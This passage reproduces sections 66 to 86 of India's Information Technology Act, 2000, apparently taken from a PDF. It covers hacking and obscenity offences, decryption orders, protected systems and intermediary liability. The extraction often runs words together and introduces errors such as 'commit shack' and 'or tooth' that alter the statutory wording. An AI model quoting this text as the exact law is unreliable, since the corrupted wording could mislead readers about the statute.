resource or diminishes its value or utility or affects it injuriously by any means, commit shack:

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine
which may extend up to two lakh rupees, or with both.

67. Publishing of information which is obscene in electronic form.

Whoever publishes or transmits or causes to be published in the electronic form, any material which
islasciviousorappealstotheprurientinterestorifitseffectissuchastotendtodepraveandcorrupt
personswhoarelikely,havingregardtoallrelevantcircumstances,toread,seeorhearthematter

58
contained or embodied in it, shall be punished on first conviction with imprisonment of either
description for a term which may extend to five years and with fine which may extend to one lakh
rupeesandintheeventofasecondorsubsequentconvictionwithimprisonmentofeitherdescription for a
term which may extend to ten years and also with fine which may extend to two lakh rupees.

68. Power of Controller to give directions.

(1) TheControllermay,byorder,directaCertifyingAuthorityoranyemployeeofsuchAuthorityto
takesuchmeasuresorceasecarryingonsuchactivitiesasspecifiedintheorderifthosearenecessary to
ensure compliance with the provisions of this Act, rules or any regulations made thereunder.

(2) Anypersonwhofailstocomplywithanyorderundersub-section(1)shallbeguiltyofanoffence and shall


be liable on conviction to imprisonment for a term not exceeding three years or to a Fine not
exceeding two lakh rupees or tooth.

69. Directions of Controller to a subscriber to extend facilities to decrypt information.

(1) If the Controller is satisfied that it is necessary or expedient so to do in the interest of the
sovereignty or integrity of India, the security of the State, friendly relations with foreign Stales or

public order or for preventing incitement to the commission of any cognizable offence, for reasons
toberecordedinwriting,byorder,directanyagencyoftheGovernmenttointerceptanyinformation
transmitted through any computer resource.

(2) The subscriber or any person in charge of the computer resource shall, when called upon by any
agencywhichhasbeendirectedundersub-section(1),extendallfacilitiesandtechnicalassistanceto
decrypt the information.

70. Protected system.

(1) The appropriate Government may, by notification in the Official Gazette, declare that any
computer, computer system or computer network to be a protected system.

(2) The appropriate Government may, by order in writing, authorize the persons who reauthorized

59
to access protected systems notified under sub-section (1).

(3) Anypersonwhosecuresaccessorattemptstosecureaccesstoaprotectedsystemincontravention of the


provisions of this section shall be punished with imprisonment of either description for a term
which may extend to ten years and shall also be liable to fine.

71. Penalty for misrepresentation.

Whoevermakesanymisrepresentationto,orsuppressesanymaterialfactfrom,theControllerorthe
Certifying Authority for obtaining any license or Digital Signature Certificate, as the case may be.
Shall be punished with imprisonment for a term which may extend to two years, or with fine which
may extend to one lakh rupees, or with both.

72. Penalty for breach of confidentiality and privacy.

Save as otherwise provided in this Act or any other law for the time being in force, any person who,
inpursuanceofanyofthepowersconferredunderthisAct,rulesorregulationsmadethereunder,has secured
access to any electronic record, book, register, correspondence, information, document or other
material without the consent of the person concerned discloses such electronic record, book.
Register, correspondence, information, document or other material to any other person shall be
punished with imprisonment for a term which may extend to two years, or with fine which may
extend to one lakh rupees, or with both.

73. Penalty for publishing Digital Signature Certificate false in certain particulars.

(1) NopersonshallpublishaDigitalSignatureCertificateorotherwisemakeitavailabletoanyother person


with the knowledge that—

(a) The Certifying Authority listed in the certificate has not issued it; or

(b) The subscriber listed in the certificate has not accepted it; or

(c) The certificate has been revoked or suspended, unless such publication is for the purpose of
verifying a digital signature created prior to such suspension or revocation.

60
(2) Any person who contravenes the provisions of sub-section (1) shall be punished with
imprisonment for a term which may extend to two years, or with fine which may extend to one lakh
rupees, or with both.

74. Publication for fraudulent purpose.

Whoever knowingly creates, publishes or otherwise makes available a Digital Signature Certificate
for any fraudulent or unlawful purpose shall be punished with imprisonment for a term which may
extend to two years, or with fine which may extend to one lakh rupees, or with both.

75. Act to apply for offence or contravention committed outside India.

(1) Subject to the provisions of sub-section (2), the provisions of this Act shall apply also to any
offence or contravention committed outside India by any person irrespective of his nationality.

(2) Forthepurposesofsub-section(1),thisActshallapplytoanoffenceorcontraventioncommitted outside


India by any person if the act or conduct constituting the offence or contravention involves
computer, computer system or computer network located in India.

76. Confiscation.

Anycomputer,computersystem,floppies,compactdisks,tapedrivesoranyotheraccessoriesrelated
thereto, in respect of which any provision of this Act. rules, orders or regulations made thereunder
hasbeenorisbeingcontravened,shallbeliabletoconfiscation:Providedthatwhereitisestablished to the
satisfaction of the court adjudicating the confiscation that the person in whose possession,
powerorcontrolofanysuchcomputer,computersystem,floppies,compactdisks,tapedrivesorany other
accessories relating thereto is found is not responsible for the contravention of the provisions of this
Act, rules, orders or regulations made thereunder, the court may, instead of making an order
forconfiscationofsuchcomputer,computersystem,floppies,compactdisks,tapedrivesoranyother
accessories related thereto, make such other order authorized by this Act against the person
contravening of the provisions of this Act, rules, orders or regulations made thereunder as it may
think fit.

61
77. Penalties or confiscation not to interfere with other punishments.

No penalty imposed or confiscation made under this Act shall prevent the imposition of any other
punishment to which the person affected thereby is liable under any other law for the time being in
force.

78. Power to investigate offences.

Notwithstanding anything contained in the Code of Criminal Procedure, 1973, a police officer not
below the rank of Deputy Superintendent of Police shall investigate any offence under this Act.

NETWORK SERVICE PROVIDERS NOT TO BE LIABLE IN CERTAIN CASES

79. Network service providers not to be liable in certain cases.

For the removal of doubts, it is hereby declared that no person providing any service as a network
service provider shall be liable under this Act, rules or regulations made thereunder for any third
party information or data made available by him if he proves that the offence or contravention was
committed without his knowledge or that he had exercised all due diligence to prevent the
commission of such offence or contravention.

Explanation.—for the purposes of this section, —

(a) "Network service provider" means an intermediary;

(b) "Third party information" means any information dealt with by a network service provider in his
capacity as an intermediary;

80. Power of police officer and other officers to enter, searched.

(1) NotwithstandinganythingcontainedintheCodeofCriminalProcedure,1973,anypoliceofficer, not


below the rank of a Deputy Superintendent of Police, or any other officer of the Central
Government or a State Government authorized by the Central Government in this behalf may enter
any public place and search and arrest without warrant any person found therein who is reasonably
suspected or having committed or of committing or of being about to commit any offence under
this

62
Act Explanation.—For the purposes of this sub-section, the expression "public place" includes any
public conveyance, any hotel, any shop or any other place intended for use by, or accessible to the
public.

(2) Where any person is arrested under sub-section (1) by an officer other than a police officer, such
officer shall, without unnecessary delay, take or send the person arrested before a magistrate having
jurisdiction in the case or before the officer-in-charge of a police station.

(3) The provisions of the Code of Criminal Procedure, 1973 shall, subject to the provisions of this
section, apply, so far as may be, in relation to any entry, search or arrest, made under this section.

81. Act to have overriding effect.

The provisions of this Act shall have effect notwithstanding anything inconsistent therewith
contained in any other law for the time being in force.

82. Controller, Deputy Controller and Assistant Controllers to be public servants.

ThePresidingOfficerandotherofficersandemployeesofaCyberAppellateTribunal,theController, the
Deputy Controller and the Assistant Controllers shall be deemed to be public servants within the
meaning of section 21 of the Indian Penal Code.

83. Power to give directions.

The Central Government may give directions to any State Government as to the carrying into
execution in the State of any of the provisions of this Act or of any rule, regulation or order made
thereunder.

84. Protection of action taken in good faith.

No suit, prosecution or other legal proceeding shall lie against the Central Government, the State
Government,theControlleroranypersonactingonbehalfofhim,thePresidingOfficer,adjudicating
officers and the staff of the Cyber Appellate Tribunal for anything which is in good faith done or
intended to be done in pursuance of this Act or any rule, regulation or order made thereunder.

63
85. Offences by companies.

(1) Where a person committing a contravention of any of the provisions of this Act or of any rule,
direction or order made thereunder is a company, every person who, at the time the contravention
was committed, was in charge of, and was responsible to, the company for the conduct of business
of the company as well as the company, shall be guilty of the contravention and shall be liable to be
proceeded against and punished accordingly:

Providedthatnothingcontainedinthissub-sectionshallrenderanysuchpersonliabletopunishment if he
proves that the contravention took place without his knowledge or that he exercised all due
diligence to prevent such contravention.

(2) Notwithstanding anything contained in sub-section (1), where a contravention of any of the
provisions of this Act or of any rule, direction or order made thereunder has been committed by a
company and it is proved that the contravention has taken place with the consent or connivance of,
orisattributabletoanyneglectonthepartof,anydirector,manager,secretaryorotherofficerofthe company,
such director, manager, secretary or other officer shall also be deemed to be guilty of the
contravention and shall be liable to be proceeded against and punished accordingly.

Explanation. —for the purposes of this section, —

(i) "Company" means anybody corporate and includes a firm or other association of individuals; and

(ii) "Director", in relation to a firm, means a partner in the firm.

86. Removal of difficulties.

(1)IfanydifficultyarisesingivingeffecttotheprovisionsofthisAct,theCentralGovernmentmay,
byorderpublishedintheOfficialGazette,makesuchprovisionsnotinconsistentwiththeprovisions of this
Act as appear to it to be necessary or expedient for removing the difficulty:

Providedthatnoordershallbemadeunderthissectionaftertheexpiryofaperiodoftwoyearsfrom the
commencement of this Act (2) Every order made under this section shall be laid, as soon as may be
after it is made, before each House ofParliament.

64
65

You might also like